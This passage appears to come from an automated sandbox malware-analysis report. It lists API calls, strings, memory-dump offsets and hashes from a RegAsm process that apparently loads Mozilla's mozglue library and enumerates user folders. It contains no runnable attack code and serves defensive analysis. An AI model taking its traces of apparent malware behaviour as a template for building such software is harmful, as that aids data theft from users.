                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000526000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000052C000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000056A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000603000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3470314060-0
                                                                                                                                                                                                                                                    • Opcode ID: 886b7e99d58f603fde3bec38b80c7b87bb4c54ec2945dde3249c2adc313b75fc
                                                                                                                                                                                                                                                    • Instruction ID: 30ffa34c3c70ebfb0eab91916ffb2bbec6ae5b413d5e5c47108456d103ae39c6
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 886b7e99d58f603fde3bec38b80c7b87bb4c54ec2945dde3249c2adc313b75fc
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7E01A171A12611EBDB20AF6694057DEB760AF00724F4A455BF814A7290C73C5EE2CBDF
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • StrStrA.SHLWAPI(015D2120,?,00000104,00000000,?,00412305,?,015D2120,00000000), ref: 0041172D
                                                                                                                                                                                                                                                    • lstrcpyn.KERNEL32(C:\Users\user\Desktop\,015D2120,00000000,00000000,?,00412305,?,015D2120,00000000), ref: 0041174B
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(?,?,00412305,?,015D2120,00000000,?,?,?,?,?,?,?,00000000), ref: 0041175E
                                                                                                                                                                                                                                                    • wsprintfA.USER32 ref: 00411771
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000523000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000526000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000052C000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000056A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000603000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: lstrcpynlstrlenwsprintf
                                                                                                                                                                                                                                                    • String ID: %s%s$C:\Users\user\Desktop\
                                                                                                                                                                                                                                                    • API String ID: 1206339513-4107738187
                                                                                                                                                                                                                                                    • Opcode ID: a9548b08038c0fc44c48867440eb6fc0a0477b7397d02b2d201bef1645a726e9
                                                                                                                                                                                                                                                    • Instruction ID: d0445b250bb9e9ffac54d7fa7f404b50c12eb4d96c707baefcfdc3b0a4e578e1
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a9548b08038c0fc44c48867440eb6fc0a0477b7397d02b2d201bef1645a726e9
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 84F096766042187FD7104F5DFC88DA7BBEEEF89764F10512AF918C7341C6319C0086A5
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    • [I %d/%d] baseprofiler_save_profile_to_file(%s), xrefs: 6C71EA9B
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ExclusiveLockRelease
                                                                                                                                                                                                                                                    • String ID: [I %d/%d] baseprofiler_save_profile_to_file(%s)
                                                                                                                                                                                                                                                    • API String ID: 1766480654-1136413219
                                                                                                                                                                                                                                                    • Opcode ID: e8c3181b5d445d6218904a16b343a7b1b9d806ee3b8d10db7ca4538875b88050
                                                                                                                                                                                                                                                    • Instruction ID: 0db78ff96a126d3acdf8fb9f6df0908558216239b9e02d2c3f9a8de08129884f
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e8c3181b5d445d6218904a16b343a7b1b9d806ee3b8d10db7ca4538875b88050
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DA41E4717042089FDB409F15C94CBA677F9FB86318FA8003AE92587F90DF31A945CBA1
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(00000104,015D20F0), ref: 00417257
                                                                                                                                                                                                                                                      • Part of subcall function 00411530: SHGetFolderPathA.SHELL32(00000000,^iB,00000000,00000000,?,00000000), ref: 00411568
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,00000000), ref: 0041727E
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,?), ref: 0041729E
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,?), ref: 004172B2
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,015C4138), ref: 004172C5
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,?), ref: 004172D9
                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,015D1748), ref: 004172ED
                                                                                                                                                                                                                                                      • Part of subcall function 0040FCD0: lstrcpy.KERNEL32(00000000,004180ED), ref: 0040FCF9
                                                                                                                                                                                                                                                      • Part of subcall function 004114D0: GetFileAttributesA.KERNEL32(00000000,00000000,00000000,004216C8,000000FF,?,0040E60A,?,00000000,00000000,00000000,?,?), ref: 004114F7
                                                                                                                                                                                                                                                      • Part of subcall function 00416FA0: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00416FCE
                                                                                                                                                                                                                                                      • Part of subcall function 00416FA0: HeapAlloc.KERNEL32(00000000), ref: 00416FD5
                                                                                                                                                                                                                                                      • Part of subcall function 00416FA0: wsprintfA.USER32 ref: 00416FEE
                                                                                                                                                                                                                                                      • Part of subcall function 00416FA0: FindFirstFileA.KERNEL32(?,?), ref: 00417005
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000523000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000526000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000052C000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000056A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000603000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: lstrcat$FileHeap$AllocAttributesFindFirstFolderPathProcesslstrcpywsprintf
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 167551676-0
                                                                                                                                                                                                                                                    • Opcode ID: ff81af64f3d3ee4ae71a454b1230c4fcf09eb2e4090a3d087d4681c0d8800c51
                                                                                                                                                                                                                                                    • Instruction ID: 553be2cdf8f16ee5d95c7c79b92d2a396468843d0ad9a53a05e7d035d860c6b9
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ff81af64f3d3ee4ae71a454b1230c4fcf09eb2e4090a3d087d4681c0d8800c51
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DB41C3B1800218ABCB15FBA0DC86FDD7778AB0C714F40459EF615A7191DB78A788CFA4
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 6C719420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,?,00000000,?,6C70F710,?,00000039,00000000,?,6C72138F,?,?,?), ref: 6C71945E
                                                                                                                                                                                                                                                      • Part of subcall function 6C719420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING,?,?,00000000,?,6C70F710,?,00000039,00000000,?,6C72138F,?,?,?), ref: 6C719470
                                                                                                                                                                                                                                                      • Part of subcall function 6C719420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING,?,?,?,00000000,?,6C70F710,?,00000039,00000000,?,6C72138F,?,?,?), ref: 6C719482
                                                                                                                                                                                                                                                      • Part of subcall function 6C719420: __Init_thread_footer.LIBCMT ref: 6C71949F
                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C71E12F
                                                                                                                                                                                                                                                    • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,6C71E084,00000000), ref: 6C71E137
                                                                                                                                                                                                                                                      • Part of subcall function 6C7194D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C7194EE
                                                                                                                                                                                                                                                      • Part of subcall function 6C7194D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,?,00000000,?), ref: 6C719508
                                                                                                                                                                                                                                                    • ?profiler_stream_json_for_this_process@baseprofiler@mozilla@@YA_NAAVSpliceableJSONWriter@12@N_N1@Z.MOZGLUE ref: 6C71E196
                                                                                                                                                                                                                                                    • ?profiler_stream_json_for_this_process@baseprofiler@mozilla@@YA_NAAVSpliceableJSONWriter@12@N_N1@Z.MOZGLUE(?,?,?,?,?,?,?,?), ref: 6C71E1E9
                                                                                                                                                                                                                                                      • Part of subcall function 6C7199A0: GetCurrentThreadId.KERNEL32 ref: 6C7199C1
                                                                                                                                                                                                                                                      • Part of subcall function 6C7199A0: AcquireSRWLockExclusive.KERNEL32(6C75F4B8), ref: 6C7199CE
                                                                                                                                                                                                                                                      • Part of subcall function 6C7199A0: ReleaseSRWLockExclusive.KERNEL32(6C75F4B8), ref: 6C7199F8
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    • [I %d/%d] WriteProfileToJSONWriter, xrefs: 6C71E13F
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: getenv$?profiler_stream_json_for_this_process@baseprofiler@mozilla@@CurrentExclusiveLockSpliceableThreadWriter@12@$AcquireInit_thread_footerRelease__acrt_iob_func__stdio_common_vfprintf_getpid
                                                                                                                                                                                                                                                    • String ID: [I %d/%d] WriteProfileToJSONWriter
                                                                                                                                                                                                                                                    • API String ID: 2491745604-3904374701
                                                                                                                                                                                                                                                    • Opcode ID: cd49332c224478835108aa024b539d53afe91c29f8d49d283574d10b6b878f23
                                                                                                                                                                                                                                                    • Instruction ID: 3fc6cf1462dcb626912427a689fcab4e8d60fcd87e7d1cc393a1b5f61baa87c5
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cd49332c224478835108aa024b539d53afe91c29f8d49d283574d10b6b878f23
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D53128B1A087049FC3009F68C6043AAF7E5AFDA708F58C43EE8944BF41EB708909C796
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • std::_Xinvalid_argument.LIBCPMT ref: 0040F60A
                                                                                                                                                                                                                                                      • Part of subcall function 0041F4C0: std::exception::exception.LIBCMT ref: 0041F4D5
                                                                                                                                                                                                                                                      • Part of subcall function 0041F4C0: __CxxThrowException@8.LIBCMT ref: 0041F4EA
                                                                                                                                                                                                                                                      • Part of subcall function 0041F4C0: std::exception::exception.LIBCMT ref: 0041F4FB
                                                                                                                                                                                                                                                    • std::_Xinvalid_argument.LIBCPMT ref: 0040F647
                                                                                                                                                                                                                                                      • Part of subcall function 0041F473: std::exception::exception.LIBCMT ref: 0041F488
                                                                                                                                                                                                                                                      • Part of subcall function 0041F473: __CxxThrowException@8.LIBCMT ref: 0041F49D
                                                                                                                                                                                                                                                      • Part of subcall function 0041F473: std::exception::exception.LIBCMT ref: 0041F4AE
                                                                                                                                                                                                                                                    • memcpy.MSVCRT ref: 0040F6A8
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1975724325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000434000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000523000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000526000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000052C000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000056A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.0000000000603000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1975724325.000000000063F000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_$memcpy
                                                                                                                                                                                                                                                    • String ID: invalid string position$string too long
                                                                                                                                                                                                                                                    • API String ID: 85833692-4289949731
                                                                                                                                                                                                                                                    • Opcode ID: 2a8c8303ee0056b0c0db705fa9d64c2a5b9a8cf8feb4cf9eb6077d2dae3d4a41
                                                                                                                                                                                                                                                    • Instruction ID: 1df43c8fdcb61b4b7a7144954488fa2be970e96293369bb1394909fd85caeaf9
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2a8c8303ee0056b0c0db705fa9d64c2a5b9a8cf8feb4cf9eb6077d2dae3d4a41
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3331C8323042109BC7309A5CF840B6AF399DBA1764F25093FF541DB7E1D67A9C4687AD
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetFileInformationByHandle.KERNEL32(00000000,?), ref: 6C70F480
                                                                                                                                                                                                                                                      • Part of subcall function 6C6DF100: LoadLibraryW.KERNEL32(shell32,?,6C74D020), ref: 6C6DF122
                                                                                                                                                                                                                                                      • Part of subcall function 6C6DF100: GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 6C6DF132
                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 6C70F555
                                                                                                                                                                                                                                                      • Part of subcall function 6C6E14B0: wcslen.API-MS-WIN-CRT-STRING-L1-1-0(6C6E1248,6C6E1248,?), ref: 6C6E14C9
                                                                                                                                                                                                                                                      • Part of subcall function 6C6E14B0: memcpy.VCRUNTIME140(?,6C6E1248,00000000,?,6C6E1248,?), ref: 6C6E14EF
                                                                                                                                                                                                                                                      • Part of subcall function 6C6DEEA0: memcpy.VCRUNTIME140(?,?,?), ref: 6C6DEEE3
                                                                                                                                                                                                                                                    • CreateFileW.KERNEL32 ref: 6C70F4FD
                                                                                                                                                                                                                                                    • GetFileInformationByHandle.KERNEL32(00000000), ref: 6C70F523
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: FileHandle$Informationmemcpy$AddressCloseCreateLibraryLoadProcwcslen
                                                                                                                                                                                                                                                    • String ID: \oleacc.dll
                                                                                                                                                                                                                                                    • API String ID: 2595878907-3839883404
                                                                                                                                                                                                                                                    • Opcode ID: ff37d21b700420d776b509b95bfe34b9a061bf2fcdf7139489947cf44128b5e4
                                                                                                                                                                                                                                                    • Instruction ID: 8a2f69cd5df722bffac6e09ecf230b8647b03781d5b4cc76e015b73abc6ee023
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ff37d21b700420d776b509b95bfe34b9a061bf2fcdf7139489947cf44128b5e4
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9541C2707087109FE721DF28C984B9BB7F4AF85318F504A2CF59183650EB70EA49CB96
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 6C719420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,?,00000000,?,6C70F710,?,00000039,00000000,?,6C72138F,?,?,?), ref: 6C71945E
                                                                                                                                                                                                                                                      • Part of subcall function 6C719420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING,?,?,00000000,?,6C70F710,?,00000039,00000000,?,6C72138F,?,?,?), ref: 6C719470
                                                                                                                                                                                                                                                      • Part of subcall function 6C719420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING,?,?,?,00000000,?,6C70F710,?,00000039,00000000,?,6C72138F,?,?,?), ref: 6C719482
                                                                                                                                                                                                                                                      • Part of subcall function 6C719420: __Init_thread_footer.LIBCMT ref: 6C71949F
                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C71E047
                                                                                                                                                                                                                                                    • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C71E04F
                                                                                                                                                                                                                                                      • Part of subcall function 6C7194D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C7194EE
                                                                                                                                                                                                                                                      • Part of subcall function 6C7194D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,?,00000000,?), ref: 6C719508
                                                                                                                                                                                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C71E09C
                                                                                                                                                                                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C71E0B0
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    • [I %d/%d] profiler_get_profile, xrefs: 6C71E057
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: getenv$free$CurrentInit_thread_footerThread__acrt_iob_func__stdio_common_vfprintf_getpid
                                                                                                                                                                                                                                                    • String ID: [I %d/%d] profiler_get_profile
                                                                                                                                                                                                                                                    • API String ID: 1832963901-4276087706
                                                                                                                                                                                                                                                    • Opcode ID: c99911afe8d4f1a3db929d85eac3d84b1986a1922f62d03a2d05978ab1e4f0cc
                                                                                                                                                                                                                                                    • Instruction ID: 5803a62afdc92c92eb04c28ac14a87b4175ef11aa01e8835f279032155b10ea6
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c99911afe8d4f1a3db929d85eac3d84b1986a1922f62d03a2d05978ab1e4f0cc
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F6218074B041089FDF04DF64D95CAAEB7B5AF89308F684428ED0AA7B40DB35A909C7A1
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000), ref: 6C737526
                                                                                                                                                                                                                                                    • __Init_thread_footer.LIBCMT ref: 6C737566
                                                                                                                                                                                                                                                    • __Init_thread_footer.LIBCMT ref: 6C737597
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Init_thread_footer$ErrorLast
                                                                                                                                                                                                                                                    • String ID: UnmapViewOfFile2$kernel32.dll
                                                                                                                                                                                                                                                    • API String ID: 3217676052-1401603581
                                                                                                                                                                                                                                                    • Opcode ID: 976c2301cb67bd8ca10828bdc10b4fc6c388e687c452cb9adc7bf495618e0b6c
                                                                                                                                                                                                                                                    • Instruction ID: f595216f5157607489524471686c9720f76b7893427939335ff498e3111de504
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 976c2301cb67bd8ca10828bdc10b4fc6c388e687c452cb9adc7bf495618e0b6c
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D421F571B00511EFDB188FB98F18E5A33B5EB46335FC41938E40A47F81DF22B91186A6
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 6C6EBF00: ??0ios_base@std@@IAE@XZ.MSVCP140(?,?,?,?,6C737A3F), ref: 6C6EBF11
                                                                                                                                                                                                                                                      • Part of subcall function 6C6EBF00: ?init@?$basic_ios@DU?$char_traits@D@std@@@std@@IAEXPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@_N@Z.MSVCP140(?,00000000,?,6C737A3F), ref: 6C6EBF5D
                                                                                                                                                                                                                                                      • Part of subcall function 6C6EBF00: ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP140(?,6C737A3F), ref: 6C6EBF7E
                                                                                                                                                                                                                                                    • ?setprecision@std@@YA?AU?$_Smanip@_J@1@_J@Z.MSVCP140(?,00000012,00000000), ref: 6C737968
                                                                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@_J@Z.MSVCP140(6C73A264,6C73A264), ref: 6C73799A
                                                                                                                                                                                                                                                      • Part of subcall function 6C6E9830: free.MOZGLUE(?,?,?,6C737ABE), ref: 6C6E985B
                                                                                                                                                                                                                                                    • ??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP140 ref: 6C7379E0
                                                                                                                                                                                                                                                    • ??1ios_base@std@@UAE@XZ.MSVCP140 ref: 6C7379E8
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
